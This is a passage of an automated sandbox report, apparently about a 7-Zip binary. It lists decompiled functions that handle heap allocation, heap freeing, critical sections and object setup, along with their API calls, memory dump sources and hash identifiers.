                                                                                  • Opcode ID: 7ab009d1e2ed9e899f1d54d1a58fb1ea226361b7bb4d783b5357aba12f66f38d
                                                                                  • Instruction ID: 543cb986228c99d3567dbcd824bb6bb0964835257bbb1fe3b9b9a9f66e7197fe
                                                                                  • Opcode Fuzzy Hash: 7ab009d1e2ed9e899f1d54d1a58fb1ea226361b7bb4d783b5357aba12f66f38d
                                                                                  • Instruction Fuzzy Hash: B541BC70A00256CFCB24CF58D48486ABBF2FF48324B248AAED4969B351C730ED56CF91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0046C003 Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 24%
                                                                                  			E0046C003(unsigned int _a4) {
				signed int _v8;
				intOrPtr _v20;
				void* _v32;
				intOrPtr _t19;
				void* _t20;
				signed char _t22;
				void* _t23;
				void* _t24;
				void* _t36;
				unsigned int _t44;
				unsigned int _t46;
				intOrPtr _t47;
				void* _t50;

				_push(0xffffffff);
				_push(0x47c848);
				_push(E0046CE74);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t47;
				_t19 =  *0x496584; // 0x1
				if(_t19 != 3) {
					__eflags = _t19 - 2;
					if(_t19 != 2) {
						goto L11;
					} else {
						_t24 = _a4;
						__eflags = _t24;
						if(_t24 == 0) {
							_t44 = 0x10;
						} else {
							_t9 = _t24 + 0xf; // 0xf
							_t44 = _t9 & 0xfffffff0;
						}
						_a4 = _t44;
						__eflags = _t44 -  *0x49015c; // 0x1e0
						if(__eflags > 0) {
							L10:
							_push(_t44);
							goto L14;
						} else {
							E0046E56A(9);
							_pop(_t36);
							_v8 = 1;
							_v32 = L0046F902(_t36, _t44 >> 4);
							_v8 = _v8 | 0xffffffff;
							E0046C0C9();
							_t23 = _v32;
							__eflags = _t23;
							if(_t23 == 0) {
								goto L10;
							}
						}
					}
				} else {
					_t46 = _a4;
					_t50 = _t46 -  *0x49657c; // 0x0
					if(_t50 > 0) {
						L11:
						_t20 = _a4;
						__eflags = _t20;
						if(_t20 == 0) {
							_t20 = 1;
						}
						_t22 = _t20 + 0x0000000f & 0x000000f0;
						__eflags = _t22;
						_push(_t22);
						L14:
						_push(0);
						_t23 = RtlAllocateHeap( *0x496580); // executed
					} else {
						E0046E56A(9);
						_v8 = _v8 & 0x00000000;
						_push(_t46);
						_v32 = L0046EE5F();
						_v8 = _v8 | 0xffffffff;
						E0046C06A();
						_t23 = _v32;
						if(_t23 == 0) {
							goto L11;
						} else {
						}
					}
				}
				 *[fs:0x0] = _v20;
				return _t23;
			}
















                                                                                  0x0046c006
                                                                                  0x0046c008
                                                                                  0x0046c00d
                                                                                  0x0046c018
                                                                                  0x0046c019
                                                                                  0x0046c026
                                                                                  0x0046c02e
                                                                                  0x0046c073
                                                                                  0x0046c076
                                                                                  0x00000000
                                                                                  0x0046c078
                                                                                  0x0046c078
                                                                                  0x0046c07b
                                                                                  0x0046c07d
                                                                                  0x0046c089
                                                                                  0x0046c07f
                                                                                  0x0046c07f
                                                                                  0x0046c082
                                                                                  0x0046c082
                                                                                  0x0046c08a
                                                                                  0x0046c08d
                                                                                  0x0046c093
                                                                                  0x0046c0c3
                                                                                  0x0046c0c3
                                                                                  0x00000000
                                                                                  0x0046c095
                                                                                  0x0046c097
                                                                                  0x0046c09c
                                                                                  0x0046c09d
                                                                                  0x0046c0b0
                                                                                  0x0046c0b3
                                                                                  0x0046c0b7
                                                                                  0x0046c0bc
                                                                                  0x0046c0bf
                                                                                  0x0046c0c1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0046c0c1
                                                                                  0x0046c093
                                                                                  0x0046c030
                                                                                  0x0046c030
                                                                                  0x0046c033
                                                                                  0x0046c039
                                                                                  0x0046c0d2
                                                                                  0x0046c0d2
                                                                                  0x0046c0d5
                                                                                  0x0046c0d7
                                                                                  0x0046c0db
                                                                                  0x0046c0db
                                                                                  0x0046c0df
                                                                                  0x0046c0df
                                                                                  0x0046c0e1
                                                                                  0x0046c0e2
                                                                                  0x0046c0e2
                                                                                  0x0046c0ea
                                                                                  0x0046c03f
                                                                                  0x0046c041
                                                                                  0x0046c047
                                                                                  0x0046c04b
                                                                                  0x0046c052
                                                                                  0x0046c055
                                                                                  0x0046c059
                                                                                  0x0046c05e
                                                                                  0x0046c063
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0046c065
                                                                                  0x0046c063
                                                                                  0x0046c039
                                                                                  0x0046c0f3
                                                                                  0x0046c0fe

                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,?,00000000,00000000,00000000), ref: 0046C0EA
                                                                                    • Part of subcall function 0046E56A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5A7
                                                                                    • Part of subcall function 0046E56A: EnterCriticalSection.KERNEL32(?,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5C2
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$AllocateEnterHeapInitialize
                                                                                  • String ID:
                                                                                  • API String ID: 1616793339-0
                                                                                  • Opcode ID: e575e1167a8f99009fb8e2b1a8c0ea7b311c1eb59cc096f5b025c246e8b2173c
                                                                                  • Instruction ID: fa3294983cb7f1a3e0ff108d5f2fbcd3700c82697a380beb40c47041fad90e01
                                                                                  • Opcode Fuzzy Hash: e575e1167a8f99009fb8e2b1a8c0ea7b311c1eb59cc096f5b025c246e8b2173c
                                                                                  • Instruction Fuzzy Hash: 8821CC31A40204EBDB10DFA5DC82BAE7764FB00764F20412BF455E72D1E77D9D41865E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0046C0FF Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 30%
                                                                                  			E0046C0FF(intOrPtr _a4) {
				signed int _v8;
				char _v20;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _t19;
				intOrPtr _t20;
				intOrPtr _t24;
				intOrPtr _t27;
				intOrPtr _t40;
				char _t42;
				intOrPtr _t49;

				_push(0xffffffff);
				_push(0x47c860);
				_push(E0046CE74);
				_t19 =  *[fs:0x0];
				_push(_t19);
				 *[fs:0x0] = _t42;
				_t40 = _a4;
				if(_t40 != 0) {
					_t20 =  *0x496584; // 0x1
					if(_t20 != 3) {
						if(_t20 != 2) {
							_push(_t40);
							goto L12;
						} else {
							E0046E56A(9);
							_v8 = 1;
							_t24 = L0046F866(_t40,  &_v44,  &_v36);
							_v40 = _t24;
							if(_t24 != 0) {
								L0046F8BD(_v44, _v36, _t24);
							}
							_v8 = _v8 | 0xffffffff;
							_t19 = E0046C1C1();
							goto L9;
						}
					} else {
						E0046E56A(9);
						_v8 = _v8 & 0x00000000;
						_t27 = L0046EB0B(_t40);
						_v32 = _t27;
						if(_t27 != 0) {
							_push(_t40);
							_push(_t27);
							L0046EB36();
						}
						_v8 = _v8 | 0xffffffff;
						_t19 = E0046C169();
						_t49 = _v32;
						L9:
						if(_t49 == 0) {
							_push(_a4);
							L12:
							_push(0);
							_t19 = RtlFreeHeap( *0x496580); // executed
						}
					}
				}
				 *[fs:0x0] = _v20;
				return _t19;
			}
















                                                                                  0x0046c102
                                                                                  0x0046c104
                                                                                  0x0046c109
                                                                                  0x0046c10e
                                                                                  0x0046c114
                                                                                  0x0046c115
                                                                                  0x0046c122
                                                                                  0x0046c127
                                                                                  0x0046c12d
                                                                                  0x0046c135
                                                                                  0x0046c175
                                                                                  0x0046c1ca
                                                                                  0x00000000
                                                                                  0x0046c177
                                                                                  0x0046c179
                                                                                  0x0046c17f
                                                                                  0x0046c18f
                                                                                  0x0046c197
                                                                                  0x0046c19c
                                                                                  0x0046c1a5
                                                                                  0x0046c1aa
                                                                                  0x0046c1ad
                                                                                  0x0046c1b1
                                                                                  0x00000000
                                                                                  0x0046c1b6
                                                                                  0x0046c137
                                                                                  0x0046c139
                                                                                  0x0046c13f
                                                                                  0x0046c144
                                                                                  0x0046c14a
                                                                                  0x0046c14f
                                                                                  0x0046c151
                                                                                  0x0046c152
                                                                                  0x0046c153
                                                                                  0x0046c159
                                                                                  0x0046c15a
                                                                                  0x0046c15e
                                                                                  0x0046c163
                                                                                  0x0046c1ba
                                                                                  0x0046c1ba
                                                                                  0x0046c1bc
                                                                                  0x0046c1cb
                                                                                  0x0046c1cb
                                                                                  0x0046c1d3
                                                                                  0x0046c1d3
                                                                                  0x0046c1ba
                                                                                  0x0046c135
                                                                                  0x0046c1dc
                                                                                  0x0046c1e7

                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,00000000,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074), ref: 0046C1D3
                                                                                    • Part of subcall function 0046E56A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5A7
                                                                                    • Part of subcall function 0046E56A: EnterCriticalSection.KERNEL32(?,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5C2
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterFreeHeapInitialize
                                                                                  • String ID:
                                                                                  • API String ID: 641406236-0
                                                                                  • Opcode ID: 620c75e95a6c718760a4149e1d88e8a335d05f3eea69c5ea2202f4b68c2d9e00
                                                                                  • Instruction ID: 879b8716ea47b65f01d40709131112694f9f6cb808c508230637e9ff792a2c59
                                                                                  • Opcode Fuzzy Hash: 620c75e95a6c718760a4149e1d88e8a335d05f3eea69c5ea2202f4b68c2d9e00
                                                                                  • Instruction Fuzzy Hash: 0921C872940204EBDB11DB96DC46BEE77B8EB05724F14052BF415A21D1F73C99408E6F
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0041741C Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 95%
                                                                                  			E0041741C(void* __ecx) {
				signed int _t41;
				void* _t50;
				intOrPtr* _t65;
				void* _t68;
				void* _t70;
				void* _t71;
				void* _t73;
				void* _t75;

				L0046B890(E00474C5C, _t68);
				_t71 = _t70 - 0x44;
				 *((intOrPtr*)(_t68 - 0x14)) = __ecx + 8;
				E0040862D();
				_t50 = 0;
				_t73 =  *0x490cc4 - _t50; // 0xb
				if(_t73 > 0) {
					 *((intOrPtr*)(_t68 - 0x10)) = 0x490c04;
					do {
						_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t68 - 0x10))));
						L004174E7(_t68 - 0x50);
						 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
						L00403593(_t68 - 0x44,  *_t65);
						 *((intOrPtr*)(_t68 - 0x4c)) =  *((intOrPtr*)(_t65 + 0x28));
						 *((intOrPtr*)(_t68 - 0x48)) =  *((intOrPtr*)(_t65 + 0x2c));
						_t41 = E0041721B(_t68 - 0x50, _t73,  *((intOrPtr*)(_t65 + 4)),  *((intOrPtr*)(_t65 + 8))); // executed
						 *((char*)(_t68 - 0x50)) = _t41 & 0xffffff00 |  *((intOrPtr*)(_t65 + 0x2c)) != 0x00000000;
						 *((char*)(_t68 - 0x18)) =  *((intOrPtr*)(_t65 + 0x24));
						L0040FA26(_t68 - 0x24,  *((intOrPtr*)(_t65 + 0x20)));
						L0046BAB0( *((intOrPtr*)(_t68 - 0x1c)), _t65 + 0xd,  *((intOrPtr*)(_t65 + 0x20)));
						_t71 = _t71 + 0xc;
						_push(_t68 - 0x50);
						L004177F2( *((intOrPtr*)(_t68 - 0x14)));
						 *(_t68 - 4) =  *(_t68 - 4) | 0xffffffff;
						E00405AAF(_t68 - 0x50);
						 *((intOrPtr*)(_t68 - 0x10)) =  *((intOrPtr*)(_t68 - 0x10)) + 4;
						_t50 = _t50 + 1;
						_t75 = _t50 -  *0x490cc4; // 0xb
					} while (_t75 < 0);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t68 - 0xc));
				return 0;
			}











                                                                                  0x00417421
                                                                                  0x00417426
                                                                                  0x0041742d
                                                                                  0x00417430
                                                                                  0x00417435
                                                                                  0x00417437
                                                                                  0x0041743d
                                                                                  0x00417445
                                                                                  0x0041744c
                                                                                  0x00417452
                                                                                  0x00417454
                                                                                  0x0041745b
                                                                                  0x00417462
                                                                                  0x0041746d
                                                                                  0x00417473
                                                                                  0x0041747c
                                                                                  0x0041748b
                                                                                  0x00417491
                                                                                  0x00417498
                                                                                  0x004174a5
                                                                                  0x004174ad
                                                                                  0x004174b3
                                                                                  0x004174b4
                                                                                  0x004174b9
                                                                                  0x004174c0
                                                                                  0x004174c5
                                                                                  0x004174c9
                                                                                  0x004174ca
                                                                                  0x004174ca
                                                                                  0x004174d7
                                                                                  0x004174de
                                                                                  0x004174e6

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00417421
                                                                                    • Part of subcall function 0041721B: __EH_prolog.LIBCMT ref: 00417220
                                                                                    • Part of subcall function 004177F2: __EH_prolog.LIBCMT ref: 004177F7
                                                                                    • Part of subcall function 00405AAF: __EH_prolog.LIBCMT ref: 00405AB4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 13a03e6f04ffa4cda12192145b7946c11b899e23e86fb6ec3b3771fabe8ff75d
                                                                                  • Instruction ID: a26e6283d8f97d39b918b8293e88733ba3edaa614f90ccffc4ac306d58a1923f
                                                                                  • Opcode Fuzzy Hash: 13a03e6f04ffa4cda12192145b7946c11b899e23e86fb6ec3b3771fabe8ff75d
                                                                                  • Instruction Fuzzy Hash: 1221BB71D002199FCB10EFE5C9819EEBBB4FF14318F10492EE056A3291DB78AA05CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0042A3CD Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 96%
                                                                                  			E0042A3CD(intOrPtr __ecx, void* __eflags) {
				intOrPtr* _t30;
				intOrPtr* _t31;
				void* _t48;

				L0046B890(0x476e89, _t48);
				_push(__ecx);
				 *((intOrPtr*)(_t48 - 0x10)) = __ecx;
				_t43 = __ecx + 0x10;
				E00421886(__ecx + 0x10); // executed
				 *((intOrPtr*)(__ecx)) = 0x47af30;
				 *((intOrPtr*)(__ecx + 4)) = 0x47ae54;
				 *((intOrPtr*)(__ecx + 8)) = 0x47ae64;
				 *((intOrPtr*)(__ecx + 0x68)) = 0;
				 *((intOrPtr*)(_t48 - 4)) = 0;
				 *((intOrPtr*)(__ecx + 0x6c)) = 0;
				 *((char*)(_t48 - 4)) = 1;
				L0042A7A4(__ecx + 0x70, 0);
				_t30 = __ecx + 0x244;
				 *((intOrPtr*)(_t30 + 4)) = 0;
				 *((intOrPtr*)(_t30 + 8)) = 0;
				 *((intOrPtr*)(_t30 + 0xc)) = 0;
				 *((intOrPtr*)(_t30 + 0x10)) = 0x10;
				 *_t30 = 0x47b2f8;
				_t31 = __ecx + 0x258;
				 *((intOrPtr*)(_t31 + 4)) = 0;
				 *((intOrPtr*)(_t31 + 8)) = 0;
				 *((intOrPtr*)(_t31 + 0xc)) = 0;
				 *((intOrPtr*)(_t31 + 0x10)) = 8;
				 *_t31 = 0x47a688;
				 *((char*)(_t48 - 4)) = 4;
				 *((intOrPtr*)(__ecx)) = 0x47b374;
				 *((intOrPtr*)(__ecx + 4)) = 0x47b364;
				 *((intOrPtr*)(__ecx + 8)) = 0x47b350;
				 *((intOrPtr*)(__ecx + 0x14)) = 4;
				 *((char*)(__ecx + 0x240)) = 0;
				E00425658(_t43);
				 *[fs:0x0] =  *((intOrPtr*)(_t48 - 0xc));
				return __ecx;
			}






                                                                                  0x0042a3d2
                                                                                  0x0042a3d7
                                                                                  0x0042a3dd
                                                                                  0x0042a3e0
                                                                                  0x0042a3e5
                                                                                  0x0042a3ea
                                                                                  0x0042a3f2
                                                                                  0x0042a3f9
                                                                                  0x0042a400
                                                                                  0x0042a403
                                                                                  0x0042a406
                                                                                  0x0042a40c
                                                                                  0x0042a410
                                                                                  0x0042a415
                                                                                  0x0042a41b
                                                                                  0x0042a41e
                                                                                  0x0042a421
                                                                                  0x0042a424
                                                                                  0x0042a42b
                                                                                  0x0042a431
                                                                                  0x0042a437
                                                                                  0x0042a43a
                                                                                  0x0042a43d
                                                                                  0x0042a440
                                                                                  0x0042a447
                                                                                  0x0042a44f
                                                                                  0x0042a453
                                                                                  0x0042a459
                                                                                  0x0042a460
                                                                                  0x0042a467
                                                                                  0x0042a46e
                                                                                  0x0042a474
                                                                                  0x0042a481
                                                                                  0x0042a489

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0042A3D2
                                                                                    • Part of subcall function 00421886: __EH_prolog.LIBCMT ref: 0042188B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 3f1d036d93fe4a1f0dd6d6d3598b18ac8637590154a54e6563d3fc336d79ae94
                                                                                  • Instruction ID: 766f131098bcf4af3a9139bea82dcdcfbf831278d29da31b0125813e173acf34
                                                                                  • Opcode Fuzzy Hash: 3f1d036d93fe4a1f0dd6d6d3598b18ac8637590154a54e6563d3fc336d79ae94
                                                                                  • Instruction Fuzzy Hash: 7A21F2B0901744CFC710DF5AC58868AFBE4FB44704F55C9AEC4AE9B621C3B8A948CB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00423DB2 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 87%
                                                                                  			E00423DB2(signed int __ecx, void* __eflags) {
				void* _t28;
				intOrPtr* _t42;
				intOrPtr* _t43;
				void* _t49;

				L0046B890(E00476263, _t49);
				_push(__ecx);
				_push(__ecx);
				 *((intOrPtr*)(_t49 - 0x10)) = __ecx;
				 *(_t49 - 4) = 4;
				E00408604(__ecx + 0xb4);
				 *(_t49 - 4) = 3;
				E00408604(__ecx + 0xa0);
				_t42 = __ecx + 0x8c;
				 *((intOrPtr*)(_t49 - 0x14)) = _t42;
				 *_t42 = 0x47b200;
				 *(_t49 - 4) = 5;
				E0040862D();
				 *(_t49 - 4) = 2;
				E00408604(_t42);
				_t43 = __ecx + 0x78;
				 *((intOrPtr*)(_t49 - 0x14)) = _t43;
				 *_t43 = 0x47b208;
				 *(_t49 - 4) = 6;
				E0040862D();
				 *(_t49 - 4) = 1;
				E00408604(_t43);
				 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
				L0040FBE3(__ecx);
				 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
				asm("sbb ecx, ecx");
				_t28 = L004239EF( ~__ecx & __ecx + 0x00000014,  ~__ecx & __ecx + 0x00000014); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0xc));
				return _t28;
			}







                                                                                  0x00423db7
                                                                                  0x00423dbc
                                                                                  0x00423dbd
                                                                                  0x00423dc2
                                                                                  0x00423dcb
                                                                                  0x00423dd2
                                                                                  0x00423ddd
                                                                                  0x00423de1
                                                                                  0x00423de6
                                                                                  0x00423dec
                                                                                  0x00423def
                                                                                  0x00423df7
                                                                                  0x00423dfb
                                                                                  0x00423e02
                                                                                  0x00423e06
                                                                                  0x00423e0b
                                                                                  0x00423e0e
                                                                                  0x00423e11
                                                                                  0x00423e19
                                                                                  0x00423e1d
                                                                                  0x00423e24
                                                                                  0x00423e28
                                                                                  0x00423e2d
                                                                                  0x00423e33
                                                                                  0x00423e38
                                                                                  0x00423e43
                                                                                  0x00423e47
                                                                                  0x00423e51
                                                                                  0x00423e59

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00423DB7
                                                                                    • Part of subcall function 004239EF: __EH_prolog.LIBCMT ref: 004239F4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: af4ea4ec6c59c69829b991c50310e000d2b28a5cce1b6cadecc5c5d10e518f9b
                                                                                  • Instruction ID: 72112a1eb2b5d99c84f1992f09ae961115561c8040eecd3d47dea80afc4ad4fc
                                                                                  • Opcode Fuzzy Hash: af4ea4ec6c59c69829b991c50310e000d2b28a5cce1b6cadecc5c5d10e518f9b
                                                                                  • Instruction Fuzzy Hash: 28110470A00648CADB04EBA9C11539EFBE59F60308F01459FD092B32D2CFB81B04C7A9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00418E2D Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 88%
                                                                                  			E00418E2D(void* __ecx, void* __eflags) {
				intOrPtr* _t21;
				signed char _t22;
				void* _t24;
				void* _t45;
				void* _t47;
				void* _t52;

				_t52 = __eflags;
				L0046B890(E00474EE0, _t47);
				_t45 = __ecx;
				_t41 = __ecx + 0x14;
				E00401E26(__ecx + 0x14,  *((intOrPtr*)(_t47 + 8)));
				_push( *((intOrPtr*)(_t47 + 0xc)));
				_t21 = L0040B0A0(_t47 - 0x18, _t41);
				 *(_t47 - 4) = 0;
				_t22 = E0040B431(__ecx + 0x20, _t41, _t52,  *_t21); // executed
				asm("sbb bl, bl");
				 *(_t47 - 4) =  *(_t47 - 4) | 0xffffffff;
				L00407A18( *((intOrPtr*)(_t47 - 0x18)));
				if( ~_t22 + 1 != 0) {
					 *((intOrPtr*)(_t47 + 8)) = 1;
					L0046B8F4(_t47 + 8, 0x47e128);
				}
				_t24 = E0040862D();
				 *(_t45 + 0x58) =  *(_t45 + 0x58) & 0x00000000;
				 *((intOrPtr*)(_t45 + 0x88)) = 0;
				 *((intOrPtr*)(_t45 + 0x8c)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return _t24;
			}









                                                                                  0x00418e2d
                                                                                  0x00418e32
                                                                                  0x00418e3c
                                                                                  0x00418e42
                                                                                  0x00418e47
                                                                                  0x00418e4c
                                                                                  0x00418e54
                                                                                  0x00418e60
                                                                                  0x00418e63
                                                                                  0x00418e6f
                                                                                  0x00418e71
                                                                                  0x00418e77
                                                                                  0x00418e7f
                                                                                  0x00418e8a
                                                                                  0x00418e91
                                                                                  0x00418e91
                                                                                  0x00418e99
                                                                                  0x00418e9e
                                                                                  0x00418ea5
                                                                                  0x00418eab
                                                                                  0x00418eb4
                                                                                  0x00418ebc

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00418E32
                                                                                    • Part of subcall function 0040B0A0: __EH_prolog.LIBCMT ref: 0040B0A5
                                                                                    • Part of subcall function 0040B431: __EH_prolog.LIBCMT ref: 0040B436
                                                                                    • Part of subcall function 0046B8F4: RaiseException.KERNEL32(0047CF70,?,00405CA1,?,?,?,0047CF70,?,?,?,00405CA1), ref: 0046B922
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
